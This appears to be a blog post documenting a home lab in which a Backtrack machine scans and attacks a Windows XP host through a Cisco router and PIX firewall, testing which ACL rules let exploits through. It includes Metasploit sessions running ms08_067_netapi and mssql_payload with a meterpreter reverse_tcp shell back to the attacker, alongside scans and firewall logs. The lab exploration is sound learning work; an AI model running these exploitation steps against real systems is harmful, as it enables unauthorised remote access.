metasploit remotely from the outside lab results so far!

Kit used for this lab GNS3 + Windows XP + Backtrack 5R3

Design
Windows XP 192.168.148.2  ——–  192.168.148.3 interface fa0/1     Cisco Router    interface fa0/0 192.168.56.3  ———-  192.168.56.2  Backtrack 5R3

The idea restrict access on the outside interface of the router 192.168.56.3 using access control list (ACL) This will simulate the real world. IE very limited access in!!

Quick nmap scan from backtrack 192.168.56.2 through the Cisco router and to Windows XP 192.168.148.2  During this scan no ACL configured on the router.

root@bt:~# nmap -sS –open 192.168.148.2

Starting Nmap 6.01 ( http://nmap.org ) at 1492-08-30 17:07 BST

Nmap scan report for 192.168.148.2

Host is up (0.022s latency).

Not shown: 990 closed ports

PORT STATE SERVICE

23/tcp open telnet

25/tcp open smtp

80/tcp open http

135/tcp open msrpc

139/tcp open netbios-ssn

443/tcp open https

445/tcp open microsoft-ds

1025/tcp open NFS-or-IIS

1433/tcp open ms-sql-s

3306/tcp open mysql

Nmap done: 1 IP address (1 host up) scanned in 35.46 seconds

————————————————————————-

Same nmap scan from backtrack 192.168.56.2 through the Cisco router and to Windows XP 192.168.148.2  During this scan the outside in was ACL configured on the router.

With acl on the outside interface allowing only port 445

root@bt:~# nmap -sS –open -p 445 192.168.148.2

Starting Nmap 6.01 ( http://nmap.org ) at 1492-08-30 17:14 BST

Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn

Nmap done: 1 IP address (0 hosts up) scanned in 1.27 seconds

————————————————————————-

Ha Nmap no good as the acl blocks icmp so  going to have to use hping to test 445 is open.

————————————————————————-

root@bt:~# hping3 -c 1 -V -I eth0 -p 445 -S 192.168.148.2

using eth0, addr: 192.168.56.2, MTU: 1500

HPING 192.168.148.2 (eth0 192.168.148.2): S set, 40 headers + 0 data bytes

len=46 ip=192.168.148.2 ttl=127 DF id=2454 tos=0 iplen=44

sport=445 flags=SA seq=0 win=64240 rtt=33.2 ms

seq=2161578984 ack=1115499289 sum=d944 urp=0

— 192.168.148.2 hping statistic —

1 packets tramitted, 1 packets received, 0% packet loss

round-trip min/avg/max = 33.2/33.2/33.2 ms

————————————————————————-

###### Reply great so 445 is enabled #####

————————————————————————-

Router config now showing the acl on outside interface only allowing port 445 in.

interface FastEthernet0/0

ip address 192.168.56.3 255.255.255.0

ip access-group out-in in

!

ip access-list extended out-in

permit tcp any any eq 445

!

————————————————————————-

msf > use windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > set rhost 192.168.148.2

rhost => 192.168.148.2

msf exploit(ms08_067_netapi) > set lhost 192.168.56.2

lhost => 192.168.56.2

msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.56.2:4444

[-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (192.168.148.2:445).

msf exploit(ms08_067_netapi) >

————————————————————————-

Fails quick re tweak of the acl to allow ip any any for a second to see what port is required shows the below.

*Mar  1 01:49:56.299: %SEC-6-IPACCESSLOGP: list out-in permitted tcp 192.168.56.2(4444) -> 192.168.148.2(1029), 1 packet

*Mar 1 01:49:56.299: %SEC-6-IPACCESSLOGP: list out-in permitted tcp 192.168.56.2(1964) -> 192.168.148.2(445), 1 packet

So port tcp 1029 is also required in for ms08_067_netapi to work!!!!!

————————————————————————-

This time setting up an acl on the inside interface to log what ports back out are required

!

interface FastEthernet0/1

ip address 192.168.148.3 255.255.255.0

ip access-group inside-out in

!

ip access-list extended inside-out

permit ip any any log

————————————————————————-

From the logging you can see outside ports required are TCP 1029 and 445. Access back shows udp 192.168.148.2(0) -> 80.86.34.68(0) ? confused by the (0) will look into this again!

*Mar 1 02:06:12.979: %SEC-6-IPACCESSLOGP: list out-in permitted tcp 192.168.56.2(4444) -> 192.168.148.2(1029), 797 packets

*Mar 1 02:06:12.979: %SEC-6-IPACCESSLOGP: list out-in permitted tcp 192.168.56.2(1837) -> 192.168.148.2(445), 1 packet

*Mar 1 02:06:12.983: %SEC-6-IPACCESSLOGP: list out-in permitted tcp 192.168.56.2(1838) -> 192.168.148.2(445), 2 packets

*Mar 1 02:06:12.983: %SEC-6-IPACCESSLOGP: list out-in permitted tcp 192.168.56.2(45983) -> 192.168.148.2(445), 42 packets

*Mar 1 02:06:43.803: %SEC-6-IPACCESSLOGP: list inside-out permitted udp 192.168.148.2(0) -> 192.168.148.255(0), 1 packet

*Mar 1 02:07:12.931: %SEC-6-IPACCESSLOGP: list out-in permitted tcp 192.168.56.2(2826) -> 192.168.148.2(445), 1 packet

*Mar 1 02:07:13.943: %SEC-6-IPACCESSLOGP: list out-in permitted tcp 192.168.56.2(2827) -> 192.168.148.2(445), 1 packet

*Mar 1 02:07:18.255: %SEC-6-IPACCESSLOGP: list out-in permitted tcp 192.168.56.2(38147) -> 192.168.148.2(445), 1 packet

*Mar 1 02:07:39.511: %SEC-6-IPACCESSLOGP: list inside-out permitted udp 192.168.148.2(0) -> 80.86.34.68(0), 1 packet

————————————————————————-

Update. Changed router for a pix as has better logging.

FW1# %PIX-2-106001: Inbound TCP connection denied from 192.168.56.2/33089 to 192.168.148.2/445 flags SYN  on interface outside
%PIX-2-106001: Inbound TCP connection denied from 192.168.56.2/33089 to 192.168.148.2/445 flags SYN  on interface outside
%PIX-2-106001: Inbound TCP connection denied from 192.168.56.2/33089 to 192.168.148.2/445 flags SYN  on interface outside
%PIX-2-106001: Inbound TCP connection denied from 192.168.56.2/33089 to 192.168.148.2/445 flags SYN  on interface outside

Seeing 445 been blocked on the outside interface so added the acl below to the firewall.

access-list outside-inside extended permit tcp any any eq 445
access-group outside-inside in interface outside

Now on the logs below you can see that only port 445 is allowed through, because the FW is stateful (All firewalls since mid 80’s are staeful checkpoint were the 1st to offer this) it now dynamically allows return traffic to be on different port numbers. 4444 talking to port 1040.

FW1# %PIX-6-302013: Built inbound TCP connection 2 for outside:192.168.56.2/60044 (192.168.56.2/60044) to inside:192.168.148.2/445 (192.168.148.2/445)
%PIX-6-110001: No route to 192.168.0.100 from 192.168.148.2
%PIX-6-302013: Built outbound TCP connection 3 for outside:192.168.56.2/4444 (192.168.56.2/4444) to inside:192.168.148.2/1040 (192.168.148.2/1040)
%PIX-6-302014: Tear-down TCP connection 2 for outside:192.168.56.2/60044 to inside:192.168.148.2/445 duration 0:00:01 bytes 12942 TCP FINs

Got bored so thought I would try mssql_payload.

msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > show payloads
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > set LHOST [MY IP ADDRESS]
msf exploit(mssql_payload) > set RHOST [TARGET IP]
msf exploit(mssql_payload) > exploit

Logs from this

FW1# %PIX-4-106023: Deny tcp src outside:192.168.56.2/50466 dst inside:192.168.148.2/1433 by access-group “outside-inside” [0x0, 0x0]
%PIX-4-106023: Deny tcp src outside:192.168.56.2/50466 dst inside:192.168.148.2/1433 by access-group “outside-inside” [0x0, 0x0]
%PIX-6-110001: No route to 192.168.0.100 from 192.168.148.2
%PIX-4-106023: Deny tcp src outside:192.168.56.2/50466 dst inside:192.168.148.2/1433 by access-group “outside-inside” [0x0, 0x0]
%PIX-4-106023: Deny tcp src outside:192.168.56.2/50466 dst inside:192.168.148.2/1433 by access-group “outside-inside” [0x0, 0x0]

Add mssql to the acl
access-list outside-inside extended permit tcp any any eq 1433

 

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s